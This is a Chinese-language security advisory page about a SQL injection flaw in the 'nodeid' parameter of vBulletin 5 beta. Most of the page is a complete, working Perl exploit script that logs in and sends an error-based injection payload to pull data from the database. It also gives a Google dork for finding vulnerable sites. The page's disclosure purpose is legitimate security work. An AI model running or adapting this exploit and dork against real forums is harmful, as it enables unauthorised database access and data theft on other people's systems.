当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

vBulletin index.php/ajax/api/reputation/vote nodeid参数SQL注入漏洞

信息来源:Orestis Kourides      发表日期:2013-02-15 16:30:00

VBulletin是一个强大灵活并可完全根据自己的需要定制的论坛程序套件。

vBulletin的index.php/ajax/api/reputation/vote脚本没有正确过滤\'nodeid\' 参数值,这可使攻击者在后端数据库中注入或操作SQL查询。

 

CVE-ID:2013-3522

受影响系统:

VBulletin VBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28

 

测试方法:

警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!# Exploit Title: vBulletin 5 Beta XX SQLi 0day

# Google Dork: "Powered by vBulletin™ Version 5.0.0 Beta"

# Date: 24/03/2013

# Exploit Author: Orestis Kourides

# Vendor Homepage: www.vbulletin.com

# Software Link:

# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28

# Tested on: Linux

# CVE : None

 

#!/usr/bin/perl

use LWP::UserAgent;

use HTTP::Cookies;

use HTTP::Request::Common;

use MIME::Base64;

system $^O eq \'MSWin32\' ? \'cls\' : \'clear\';

print "

+===================================================+

|           vBulletin 5 Beta XX SQLi 0day           |

|              Author: Orestis Kourides             |

|             Web Site: www.cyitsec.net             |

+===================================================+

";

 

if (@ARGV != 5) {

    print "\\r\\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\\r\\n";

    exit;

}

 

$host       = $ARGV[0];

$path       = $ARGV[1];

$username   = $ARGV[2];

$password   = $ARGV[3];

$magicnum   = $ARGV[4];

$encpath    = encode_base64(\'http://\'.$host.$path);

print "[+] Logging\\n";

print "[+] Username: ".$username."\\n";

print "[+] Password: ".$password."\\n";

print "[+] MagicNum: ".$magicnum."\\n";

print "[+] " .$host.$path."auth/login\\n";

my $browser = LWP::UserAgent->new;

my $cookie_jar = HTTP::Cookies->new;

my $response = $browser->post( \'http://\'.$host.$path.\'auth/login\',

    [

        \'url\' => $encpath,

        \'username\' => $username,

        \'password\' => $password,

    ],

    Referer => \'http://\'.$host.$path.\'auth/login-form?url=http://\'.$host.$path.\'\',

    User-Agent => \'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0\',

);

$browser->cookie_jar( $cookie_jar );

my $browser = LWP::UserAgent->new;

$browser->cookie_jar( $cookie_jar );

print "[+] Requesting\\n";

my $response = $browser->post( \'http://\'.$host.$path.\'index.php/ajax/api/reputation/vote\',

    [

        \'nodeid\' => $magicnum.\') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338\',

    ],

    User-Agent => \'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0\',

);

$data = $response->content;

if ($data =~ /(#((\\\\.)|[^\\\\#])*#)/) { print \'[+] Version: \'.$1 };

print "\\n";

exit 1;

解决办法:

厂商补丁:

 

VBulletin

---------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

 

http://www.vbulletin.com/

参考信息:

http://www.osvdb.org/92031